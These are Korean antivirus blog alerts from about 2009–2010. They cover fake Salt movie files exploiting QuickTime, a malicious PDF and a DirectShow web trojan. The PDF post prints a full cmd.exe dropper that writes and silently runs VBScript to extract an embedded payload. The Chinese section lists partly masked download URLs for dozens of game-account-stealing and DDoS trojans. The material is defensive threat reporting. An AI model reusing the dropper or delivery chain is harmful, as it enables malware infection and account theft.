태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2010.08.02 18:01


Apple 사에서 제작한 퀵타임 플레이어(QuickTime Player)의 취약점을 이용하는 악성코드가 해외에서 발견되었습니다.

해당 파일들은 안젤리나 졸리 주연의 솔트(Salt) 영화의 DVD 동영상 파일처럼 위장하고 있다.

http://www.saltmovie.co.kr/


사용자 삽입 이미지

해외 업체들은 신속하게 업데이트에 포함시키고 있습니다.

취약점이 존재하는 파일을 퀵타임 플레이어로 재생하면 다음과 같은 플레이어 화면이 나오고, 이후에 특정 파일의 다운로드 시도창이 보여집니다.

001_Dvdrip_Salt.mov 파일의 내부 화면


001_Dvdrip_Salt.mov 파일이 실행된 경우..

QuickTime Player 재생 타이틀 부분에 "Please install Media Song Player" 라는 내용을 보여주고, 사용자로 하여금 다운로드가 시도되는 "Music_Installer.exe" 파일을 실행하도록 유도한다.

사용자 삽입 이미지

사용자 삽입 이미지

다운로드가 시도되는 Music_Installer.exe 파일의 진단현황입니다.

http://www.virustotal.com/analisis/f1575887d700e245631745e27f7d9736087bbb3b46e0100208e31a99b6ec9098-1280721989

salt_dvdrpi[btjunkie][xtrancex].mov 파일이 실행된 경우..


 Erro: codec update is required. 제목과 함께 QuickTime Update 파일명(QuickTime_Update_KB264522.exe)처럼 위장한 악성코드 다운로드 시도 창이 보여진다.


QuickTime_Update_KB264522.exe 파일 진단 현황

http://www.virustotal.com/analisis/a109fe8c92b13305ccaa1076c2ee0b7ebede79de4d825325e5921c44a52702bf-1280722028


nProtect Anti-Virus 패턴에 긴급 업데이트가 진행 중에 있습니다.

Posted by viruslab
보안관련소식2010.06.09 12:17


PDF 취약점 파일 감염 과정입니다.

보통 이메일 첨부파일 형태로 불특정 다수에게 배포되기도 합니다.

참고 자료 보기
pdf 악성코드 메일로 유포된 사례
viruslab.tistory.com

먼저 해당 파일을 실행하면 다음과 같은 화면과 문서 파일이 뒷부분으로 보여집니다.

사용자 삽입 이미지

C:\WINDOWS\system32\cmd.exe /c echo Dim BinaryStream > temp_system321.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream") >> temp_system321.vbs && echo BinaryStream.Type = 1 >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.LoadFromFile FindLastModified(".") >> temp_system321.vbs && echo BinaryStream.Position=77072      >> temp_system321.vbs && echo s = BinaryStream.Read (204444    -77072     ) >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.Write s >> temp_system321.vbs && echo BinaryStream.SaveToFile "temp_system322.vbs",2 >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo dim wshshell >> temp_system321.vbs && echo set wshshell = wscript.createobject("wscript.shell") >> temp_system321.vbs && echo wshshell.run "temp_system322.vbs",0,FALSE >> temp_system321.vbs && echo Function FindLastModified(strDir)   >> temp_system321.vbs && echo Set objFSO = CreateObject("Scripting.FileSystemObject")   >> temp_system321.vbs && echo Set oFolder = objFSO.GetFolder(strDir)   >> temp_system321.vbs && echo d = CDate("1/1/1950")   >> temp_system321.vbs && echo For Each oFile In oFolder.Files   >> temp_system321.vbs && echo If oFile.DateLastModified ^> d and InStr(oFile.Name, ".pdf") ^> 0 Then   >> temp_system321.vbs && echo NewestFile = oFile.Name   >> temp_system321.vbs && echo d = oFile.DateLastModified   >> temp_system321.vbs && echo End If   >> temp_system321.vbs && echo Next   >> temp_system321.vbs && echo FindLastModified = NewestFile   >> temp_system321.vbs && echo End Function    >> temp_system321.vbs  && temp_system321.vbs


  && echo


PLEASE PRESS OK BUTTON!



사용자 삽입 이미지

system321.vbs, system322.vbs 등의 스크립트 파일을 생성하여 exe 파일을 설치합니다.
 
사용자 삽입 이미지
사용자 삽입 이미지

현재 system32.exe 파일이 생성되지만 손상된 형태로 만들어지고 있는 것으로 파악되었습니다.

바이러스 토탈 진단 현황

http://www.virustotal.com/analisis/1e70058128ebfff634a453483dd48cc4e929bda17e960d1d5c0e2b7722ca017a-1276041725

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.09 Exploit.PDF-Dropper!IK
AhnLab-V3 2010.06.09.00 2010.06.09 -
AntiVir 8.2.2.6 2010.06.08 -
Antiy-AVL 2.0.3.7 2010.06.08 -
Authentium 5.2.0.5 2010.06.08 PDF/Expl.HY
Avast 4.8.1351.0 2010.06.08 PDF:Risk-A
Avast5 5.0.332.0 2010.06.08 PDF:Risk-A
AVG 9.0.0.787 2010.06.08 -
BitDefender 7.2 2010.06.09 Exploit.PDF-Dropper.Gen
CAT-QuickHeal 10.00 2010.06.08 -
ClamAV 0.96.0.3-git 2010.06.09 -
Comodo 5033 2010.06.09 -
DrWeb 5.0.2.03300 2010.06.09 -
eSafe 7.0.17.0 2010.06.08 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7618 2010.06.08 PDF/POS!exploit
F-Prot 4.6.0.103 2010.06.08 -
F-Secure 9.0.15370.0 2010.06.08 Exploit.PDF-Dropper.Gen
Fortinet 4.1.133.0 2010.06.08 -
GData 21 2010.06.09 Exploit.PDF-Dropper.Gen
Ikarus T3.1.1.84.0 2010.06.08 Exploit.PDF-Dropper
Jiangmin 13.0.900 2010.06.08 -
Kaspersky 7.0.0.125 2010.06.08 Trojan-Dropper.VBS.Pdfka.a
McAfee 5.400.0.1158 2010.06.09 Exploit-PDF.ck
McAfee-GW-Edition 2010.1 2010.06.08 -
Microsoft 1.5802 2010.06.08 -
NOD32 5183 2010.06.08 -
Norman 6.04.12 2010.06.08 -
nProtect 2010-06-08.01 2010.06.08 Exploit.PDF-Dropper.Gen
Panda 10.0.2.7 2010.06.08 -
PCTools 7.0.3.5 2010.06.09 HeurEngine.PDF
Prevx 3.0 2010.06.09 -
Rising 22.51.01.04 2010.06.08 -
Sophos 4.53.0 2010.06.09 -
Sunbelt 6421 2010.06.09 -
Symantec 20101.1.0.89 2010.06.08 Bloodhound.PDF.24
TheHacker 6.5.2.0.295 2010.06.08 -
TrendMicro 9.120.0.1004 2010.06.08 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.09 -
VBA32 3.12.12.5 2010.06.08 -
ViRobot 2010.6.8.2343 2010.06.08 -
VirusBuster 5.0.27.0 2010.06.08 VBS.Exedrop.F



Posted by viruslab
보안관련소식2009.09.09 15:47
신종악성코드정보2009.07.07 08:49


http://www.nprotect.com/v6/contents/index.php?mode=inca_sc_view&no=68

사용자 삽입 이미지

중국내에서 악성코드 유포에 사용되고 있으며, 현재 이 시간 유포가 진행되고 있는 사이트가 존재한다.

Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit漏洞
受影响的软件:
Microsoft DirectShow(msvidctl.dll)
描述和解决方案:
安装安天防线2009和锐甲可以阻挡Microsoft DirectShow微软视频0DAY漏洞网马

1、网页木马直接下载的病毒文件:
http://xin765***.com/wm/svchost.exe 病毒名:Trojan/Win32.Killav.gg[Dropper]
描述:下载者木马,关闭安全软件进程、连接网络下载大量病毒文件
衍生文件:
c:\WINDOWS\system32\drivers\etc\hosts
c:\WINDOWS\system32\drivers\OLD3.tmp
c:\WINDOWS\system32\drivers\pcidump.sys
c:\WINDOWS\system32\drivers\acpiec.sys
c:\WINDOWS\system32\dllcache\acpiec.sys
c:\WINDOWS\system32\func.dll
c:\WINDOWS\phpq.dll
c:\WINDOWS\LastGood\system32\drivers\acpiec.sys
c:\1.exe
c:\autorun.inf
2、病毒读取网络下载列表地址:
http://babi2009***.com/360/aa1dfh.txt
3、由下载者木马下载的其他病毒文件:
http://haha888l***.com/xiao/aa1.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:梦幻西游盗号木
衍生文件:
c:\WINDOWS\system32\kSVHjMeWr5ZZY47.dll
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf

http://haha888l***.com/xiao/aa2.exe 病毒名:Trojan/Win32.Magania.bjsy[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\EN7hzSreCat8.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\R6WhWBmZsEdPZDjQP.Ttf

http://haha888l***.com/xiao/aa3.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:封神榜?网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\JPccCJnKygDdp3.dll
c:\WINDOWS\Fonts\uawyv9Pr.Ttf

http://haha888l***.com/xiao/aa4.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:大话西游 ii游戏盗号木马
衍生文件:
c:\WINDOWS\system32\GsfMwDWD3.dll
c:\WINDOWS\Fonts\QT7f3JmmJrcx.Ttf

http://haha888l***.com/xiao/aa5.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\m75TJUvNjzQF.Ttf
c:\WINDOWS\Fonts\wQ7KbaNZKMe5G4qZ.fon

http://haha888l***.com/xiao/aa6.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\xg4hAPNygs29.dll
c:\WINDOWS\Fonts\K7XaTBMWp8TPrYgw.Ttf

http://haha888l***.com/xiao/aa7.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\dktXFYbT3G.dll
c:\WINDOWS\Fonts\xFQymHn5e4keKWye.Ttf

http://haha888l***.com/xiao/aa8.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\P2xnxaS5acXpS95.dll
c:\WINDOWS\Fonts\m75TJUvNjzQF.Ttf

http://haha888l***.com/xiao/aa9.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:剑侠世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

http://haha888l***.com/xiao/aa10.exe 病毒名:Trojan/Win32.Magania.bfws[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\T4HyJ7uGEauA.Ttf
c:\WINDOWS\Fonts\MqppW9KYn.fon

http://haha888l***.com/xiao/aa11.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\taNjsFa2tT2Dh.dll
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf

http://haha888l***.com/xiao/aa12.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:生存之旅游戏盗号木马
衍生文件:
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

http://haha888l***.com/xiao/aa13.exe 病毒名:Trojan/Win32.Magania.bfdq[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\E4814792.dll
c:\WINDOWS\Fonts\EEUJgNKN6xmNqKr6.Ttf

http://haha888l***.com/xiao/aa14.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:传奇游戏盗号木
衍生文件:
c:\WINDOWS\Fonts\MhaUKGazkr3fZZKp.Ttf
c:\WINDOWS\Fonts\fyrwJf5Qfhh.fon

http://haha888l***.com/xiao/aa15.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\A0C86020.dll
c:\WINDOWS\Fonts\6e6EUdxVeWUYJynN.Ttf

http://haha888l***.com/xiao/aa16.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf
c:\WINDOWS\Fonts\zAPWgSjGrSpdsE4.fon

http://haha888l***.com/xiao/aa17.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\qB5BKZy7vR5m.dll
c:\WINDOWS\Fonts\PeMTdMfqzpGTb5ps.Ttf

http://haha888l***.com/xiao/aa18.exe 病毒名:Trojan/Win32.Magania.bfsy[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\JNwybEjgUVaxBU5d.Ttf
c:\WINDOWS\Fonts\CESPVP8FQd.fon

http://haha888l***.com/xiao/aa19.exe 病毒名:Trojan/Win32.Magania.bfsy[GameThief]
描述:QQ厦华游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\pDuuqr4BgFn65AeW.Ttf
c:\WINDOWS\Fonts\vwuXtYbhj.fon

http://haha888l***.com/xiao/aa20.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:大话西游3游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ndxq9awMc.dll
c:\WINDOWS\Fonts\CRp3uYCmcxMp3qQn9.Ttf

http://haha888l***.com/xiao/aa21.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:魔域游戏盗号木
衍生文件:
c:\WINDOWS\system32\08223B03.dll
c:\WINDOWS\Fonts\eCgMhGRkPUcdutd0.Ttf

http://haha888l***.com/xiao/aa22.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

http://haha888l***.com/xiao/aa23.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\dhDhwS7fFW.dll
c:\WINDOWS\Fonts\cD9KArZZUHxCqnyM.Ttf

http://haha888l***.com/xiao/aa24.exe 病毒名:Trojan/Win32.Magania.bkcz[GameThief]
描述:永恒之塔游戏盗号木马
衍生文件:
c:\WINDOWS\system32\Va7SpUWgCA5f.dll
c:\WINDOWS\Fonts\FCvvnT2B.Ttf

http://haha888l***.com/xiao/aa25.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\EHMs25j4ArEwPKHS.Ttf
c:\WINDOWS\Fonts\vgUGf6VF2E.fon

http://haha888l***.com/xiao/aa26.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ybM7kf9heVHDx.dll
c:\WINDOWS\Fonts\EcZFMzAp3.Ttf

http://haha888l***.com/xiao/aa27.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:传奇外传游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\du3Q2JXbHYGxcSAe.Ttf
c:\WINDOWS\Fonts\tY5UFS434YYd.fon

http://haha888l***.com/xiao/aa28.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\GU6f5sW42mdc.dll
c:\WINDOWS\Fonts\avJ9SdDwMd9Qzt.Ttf

http://haha888l***.com/xiao/aa29.exe Trojan/Win32.Magania.bfrp[GameThief]
描述:华夏2游戏盗号木马
衍生文件:
c:\WINDOWS\system32\2EF0D734.dll
c:\WINDOWS\Fonts\Qq3qg7RGSp9raxWW.Ttf

http://haha888l***.com/xiao/aa30.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\RhdwE8NYdbqQ.dll
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf

http://haha888l***.com/xiao/aa31.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\wadSSw5k.dll
c:\WINDOWS\Fonts\Vx53f7Scj63HVHDE.Ttf

http://haha888l***.com/xiao/aa32.exe 病毒名:Trojan/Win32.Magania.bkcv[GameThief]
描述:梦幻西游online游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf
c:\WINDOWS\Fonts\xbpCfXnG6wUVF.fon

http://haha888l***.com/xiao/aa33.exe 病毒名:Trojan/Win32.OnLineGames.bmiz[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\usbvmx.dll
c:\WINDOWS\system32\ed78ab9.dll
c:\WINDOWS\Fonts\yGMHUAj5Npydj8FZ.ttf

http://haha888l***.com/xiao/aa34.exe 病毒名:Trojan/Win32.QQFish.l[PSW]
描述:钓鱼木马伪装QQ官方发布中奖信息
衍生文件:
c:\WINDOWS\system32\www.qq13x.cn

http://haha888l***.com/xiao/aa35.exe 病毒名:Trojan/Win32.OnLineGames.bmzy[GameThief]
描述:QQ盗号木马
衍生文件:
c:\Documents and Settings\a\Application Data\Set8.dll
c:\Documents and Settings\a\Application Data\Set8.tmp
c:\Documents and Settings\a\Application Data\R8.bak

http://haha888l***.com/xiao/aa36.exe 病毒名:Trojan/Win32.Agent.fn[DDoS]
描述:后门木马,发布DDOS攻击
衍生文件:
c:\WINDOWS\system32\aa36.exe

http://haha888l***.com/xiao/1.exe 病毒名:Trojan/VBS.IEstart.e
描述:利用脚本执行命令:
vbscript:CreateObject("WScript.Shell").Run("iexplore http://tj.mehoab***.com/bb/tj1jdoiash.htm",0)(window.close)连接该域名地址发送安装统计信息
衍生文件:无


Posted by viruslab